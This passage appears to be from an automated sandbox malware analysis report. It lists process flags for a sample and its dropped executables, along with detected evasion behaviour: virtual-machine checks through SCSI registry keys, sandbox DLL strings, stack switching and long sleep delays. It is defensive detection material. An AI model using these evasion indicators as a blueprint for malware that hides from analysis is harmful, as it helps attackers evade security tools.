        Source: C:\Users\user\AppData\Local\Temp\A723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Yara detected AntiVM3
        Source: Yara matchFile source: Process Memory Space: 3E6C.exe PID: 5796, type: MEMORYSTR
        Checks if the current machine is a virtual machine (disk enumeration)
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Roaming\jagviseKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Roaming\jagviseKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Roaming\jagviseKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Roaming\jagviseKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Roaming\jagviseKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Roaming\jagviseKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
        Source: C:\Users\user\AppData\Roaming\jagviseAPI/Special instruction interceptor: Address: 7FFE2220E814
        Source: C:\Users\user\AppData\Roaming\jagviseAPI/Special instruction interceptor: Address: 7FFE2220D584
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: hoEtvOOrYH.exe, 00000000.00000002.1732224334.000000000089E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKJ>
        Source: 3E6C.exe, 0000000C.00000002.3947321786.0000000003027000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeMemory allocated: 1500000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeMemory allocated: 2F80000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeMemory allocated: 2E80000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1010000 memory reserve | memory write watch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2DD0000 memory reserve | memory write watch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2BE0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Roaming\Result.exeMemory allocated: 13D0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Roaming\Result.exeMemory allocated: 2EC0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Roaming\Result.exeMemory allocated: 1570000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Result.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\Result.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 437Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1590Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 942Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 360Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3233Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 876Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 878Jump to behavior
        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 461Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeWindow / User API: threadDelayed 565Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Result.exeWindow / User API: threadDelayed 379
        Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\77D2.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\A723.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BookingsJump to dropped file
        Source: C:\Windows\explorer.exe TID: 7404Thread sleep time: -159000s >= -30000sJump to behavior
        Source: C:\Windows\explorer.exe TID: 7400Thread sleep time: -94200s >= -30000sJump to behavior
        Source: C:\Windows\explorer.exe TID: 7728Thread sleep time: -33700s >= -30000sJump to behavior
        Source: C:\Windows\explorer.exe TID: 7724Thread sleep time: -36000s >= -30000sJump to behavior
        Source: C:\Windows\explorer.exe TID: 7404Thread sleep time: -323300s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exe TID: 4296Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exe TID: 4296Thread sleep time: -100000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exe TID: 4364Thread sleep count: 565 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exe TID: 4296Thread sleep time: -99872s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exe TID: 4296Thread sleep time: -99749s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exe TID: 4296Thread sleep time: -99640s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exe TID: 4296Thread sleep time: -99531s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exe TID: 4296Thread sleep time: -99415s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exe TID: 4296Thread sleep time: -99292s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exe TID: 4296Thread sleep time: -99169s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exe TID: 4296Thread sleep time: -99039s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exe TID: 4296Thread sleep time: -98920s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exe TID: 4296Thread sleep time: -98812s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exe TID: 4296Thread sleep time: -98698s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exe TID: 4296Thread sleep time: -98562s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exe TID: 4296Thread sleep time: -98451s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exe TID: 4296Thread sleep time: -98342s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Result.exe TID: 2520Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Result.exe TID: 2520Thread sleep time: -100000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Result.exe TID: 2848Thread sleep count: 379 > 30
        Source: C:\Users\user\AppData\Roaming\Result.exe TID: 2520Thread sleep time: -99857s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Result.exe TID: 2520Thread sleep time: -99746s >= -30000s
